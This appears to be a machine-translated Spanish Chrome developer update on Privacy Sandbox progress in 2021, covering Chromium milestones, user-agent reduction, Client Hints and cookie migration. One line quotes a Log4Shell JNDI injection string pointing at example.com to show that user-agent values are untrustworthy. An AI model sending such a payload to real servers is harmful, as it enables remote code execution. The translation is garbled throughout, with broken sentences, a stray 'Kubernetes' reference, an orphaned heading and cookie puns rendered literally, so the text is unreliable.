Progreso en Privacy Sandbox (diciembre de 2021)

Te damos la bienvenida a la edición 2021 de resumen del progreso en la privacidad la zona de pruebas, el seguimiento de los hitos el camino para eliminar de forma gradual las cookies de terceros en Chrome la Web privada. Normalmente, compartimos una descripción general de las actualizaciones de Privacy Sandbox cronograma junto con noticias de todo el mundo proyecto, pero diciembre fue un mes tranquilo. En cambio, repasaremos algunas de las actividades a lo largo de 2021 y proporcionan algunas posibles soluciones ahora estamos en el año nuevo.

Proceso de desarrollo de Chromium

Para que una nueva función de plataforma web llegue a Chromium, debe pasar por el desarrollo abierto de cada proyecto . En 2021, el El equipo de Privacy Sandbox produjo lo siguiente:

🥚Intención de crear prototipos 19
🧪Intención de experimentar(7)
🚀Intención de enviar 11
Fuente
.

Cada hito también es una invitación para que contribuya el ecosistema web más amplio.

El intento de crear un prototipo es el primer punto de control, en el que incitamos al debate. y los primeros días de experimentación. Esto significa que una propuesta estará disponible en GitHub, en el que puedes hacer una pregunta creando un Problema o unirte a debates y presentaciones en estándares grupos, como W3C y como IETF. Aquí es también donde comienza la codificación, lo que significa que podrían de prototipos esté disponible para que los desarrolladores las prueben detrás de un función marca. Los comentarios iniciales son fundamentales para la validación y la iteración de las propuestas.

El intento de experimentar es un paso opcional si queremos solicitar una prueba de origen. Los desarrolladores pueden registrarse en el origen. prueba de una función y, luego, pruébala en producción. Se llama experimento porque tenemos aspectos específicos de la función queremos validar en entornos del mundo real. Desarrolladores que pueden probar y comparte los resultados de esas pruebas y brinda comentarios valiosos para ayudar a iterar y a evolucionar la función.

Un intent to Ship es el último hito que indica que una función ya está estén completos y listos para la disponibilidad general. Una vez aprobada, la función se se combinó con un próximo lanzamiento y continúa con la versión Canary, beta y estables. Es fundamental que se asegure de probar sus sitios con los Canary y Versiones beta de Chrome para detectar y informar cualquier error antes de que una función alcance el estado estable.

Propuestas

Cada propuesta de Privacy Sandbox tiene un repositorio de GitHub complementario. R de Kubernetes aloja una explicación para resumir la funcionalidad general, una una especificación específica para la implementación por navegadores y las contribuciones de toda web en forma de problemas y solicitudes de extracción.

En 14 repositorios de Privacy Sandbox, tuvimos lo siguiente:

💬545Se crearon los problemas
250Se cerraron los problemas
🛠️261Se crearon las solicitudes de extracción
223Se combinaron las solicitudes de extracción
Fuente
.

El lenguaje de las explicaciones y especificaciones suele estar dirigido a un público con los estándares y el desarrollo de navegadores, que pueden desafiante si no estás familiarizado con él. Sin embargo, el objetivo de una explicación explicar. Si hay puntos que no son claros o que no se tratan, queremos que presentar un problema para que podamos actualizar y aclarar la explicación.

de DNS pasivo

Limpieza de primavera de usuario-agente

Mientras estábamos contando hacia abajo para Año Nuevo, también estamos contando hacia arriba para ambos Chrome 100 y la reducción incremental de la cadena usuario-agente. Este es un buen para volver a consultar el uso de la cadena usuario-agente en tu código se ve afectado por cualquiera de estos cambios.

Para encontrar esas áreas, haz lo siguiente:

  1. Busca navigator.userAgent en tu código JavaScript o accede al User-Agent en el código de tu servidor.
  2. Verifica tu análisis de la cadena para ver las suposiciones sobre una versión de 2 dígitos. Para ejemplo, una regex que especifique \d\d o \d{2} debe reemplazarse por \d+
  3. Verifica el uso de la cadena en cualquier lugar en el que te bases:
    • versión de la plataforma (sistema operativo)
    • versión de compilación completa de Chrome
    • nombre del dispositivo móvil
  4. Estos son los valores que se reducirán a cadenas fijas en el futuro. Si si necesitas acceso a estos valores, migra al cliente de usuario-agente Pistas.

Hay una actualización de diciembre para mencionar si estás adoptando el rol de cliente Pistas: enviamos la Intent de envío para habilitar la delegación de sugerencias a otras orígenes en HTML con una etiqueta <meta>. Por ejemplo:

<meta name="accept-ch" content="sec-ch-ua-model=( https://foo.bar )">

Si tienes un estado de ánimo entusiasta de la limpieza de primavera, también puedes considerar alternativas al uso del usuario-agente en su totalidad. Si estás usando la cadena para detectar dispositivos móviles e investigar si puede reemplazarlo por el diseño de tu producto. Si quieres comprobar el nombre y la versión del navegador para comprobar la compatibilidad de las funciones, consulta si en su lugar puedes usar la detección de funciones.

Siempre vale la pena recordar que el usuario-agente, como cualquier cliente proporcionado valor, no se garantiza que sea exacto ni se proporcione. El Log4j reciente “Log4shell” proporciona un ejemplo de este riesgo. Un cliente que establece su cadena usuario-agente en incluir un valor como ${jndi:ldap://example.com/file} podría obtener un sitio para analizarlos de forma activa en el servidor.

Otra actividad tradicional de Año Nuevo es asegurarse de estar feliz una cantidad saludable de galletas con ingredientes de calidad. A medida que seguimos avanzando hacia la eliminación gradual de las cookies de terceros, debes asegurarte de conocer qué cookies de tu sitio se verán afectadas. El 2020 fue una ventaja se hizo necesario para marcar todas las cookies para el tráfico usar con SameSite=None.

Todas las cookies en las que hayas establecido el atributo SameSite como None necesitarán un actualización.

Hay tres rutas posibles que se deben considerar en este momento:

  1. Si la cookie solo se requiere en una relación 1:1 con el sitio de nivel superior, luego sigue el progreso del proceso CHIPS propuesta. Esto implicará agregar Partitioned a la cookie.
  2. Si la cookie se usa en un contexto de varios sitios, pero solo entre sitios en los que posee y administra, puede ser una candidata para el programa First-Party Sets. Esto requiere definir sitios del conjunto y agregar el atributo SameParty a la cookie.
  3. Si la cookie se usa para proporcionar alguna forma de valor compartido entre varias investigar el conjunto más amplio de Privacy Sandbox propuestas de una solución alternativa que no dependen del seguimiento entre sitios.

Si ya se siente más saludable, este también es el momento ideal de volver a usar todas las cookies, ya que tenemos una receta para mejorar cookies propias.

Comentarios

A medida que sigamos publicando estas actualizaciones mensuales y avancemos en el Privacy Sandbox en su conjunto, queremos asegurarnos de que los desarrolladores reciban el la información y el apoyo que necesitan. Infórmanos en @ChromiumDev Twitter si hay algo que podamos mejorar en esta serie. Usaremos tus comentarios para seguir mejorando el formato.

Consulta las Preguntas frecuentes de Privacy Sandbox, que se continúa expandiéndose en función de los problemas que envíes al equipo de asistencia para desarrolladores repo. Si si tiene preguntas sobre la prueba o implementación de cualquiera de las propuestas vengan a hablar con nosotros.